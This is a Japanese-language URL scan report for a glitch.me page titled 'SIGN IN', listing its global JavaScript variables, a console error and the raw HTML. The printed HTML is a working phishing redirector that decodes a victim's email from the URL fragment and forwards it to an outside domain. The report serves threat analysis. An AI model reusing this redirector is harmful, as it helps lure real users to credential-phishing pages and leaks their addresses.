- スキャンID:
- 36c7eb32-13dd-4263-a366-2ba01a5f583f終了
- 送信済みURL:
- https://heluniversalec.glitch.me/
- レポート終了日:
リンク · 0件検出
ページから特定された発信リンク
JavaScript変数 · 5件検出
ページのウィンドウオブジェクトにロードされたグローバルのJavaScript変数は関数以外の場所で宣言された変数で、現在のスコープ内であればコードのどこからでもアクセス可能です
名前 | 規模 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
base64Decode | function |
hash | string |
コンソールログメッセージ · 1件検出
Webコンソールにログ記録されたメッセージ
規模 | 分類 | ログ |
---|---|---|
error | network |
|
HTML
未加工のHTMLページ本文
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>SIGN IN</title>
</head>
<body>
<script>
function base64Decode(str) {
try {
return decodeURIComponent(atob(str).split('').map(function(c) {
return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);
}).join(''));
} catch (e) {
console.error('Invalid base64 string:', str);
return null;
}
}
var hash = window.location.hash;
if (hash !== "") {
hash = hash.substring(1); // Remove the '#' character
const email = base64Decode(hash);
if (email) {
window.location.href = "https://sales5rrt.digital/hdqops/Nandsrotomould.html#" + (email);
}
}
</script>
</body></html>